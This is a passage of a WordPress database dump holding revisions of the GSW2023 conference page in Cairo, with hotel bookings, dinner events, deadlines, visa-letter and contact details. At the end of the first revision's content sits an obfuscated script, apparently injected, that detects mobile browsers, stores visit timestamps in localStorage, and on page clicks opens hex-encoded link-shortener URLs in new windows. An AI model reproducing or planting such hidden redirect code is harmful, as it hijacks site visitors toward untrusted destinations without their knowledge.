18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:54:58','2023-08-16 02:54:58','',3066,'https://gsw2023.com/?p=5273',0,'revision','',0),
(5274,1,'2023-08-16 02:57:05','2023-08-16 02:57:05','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154512301{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h5>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner 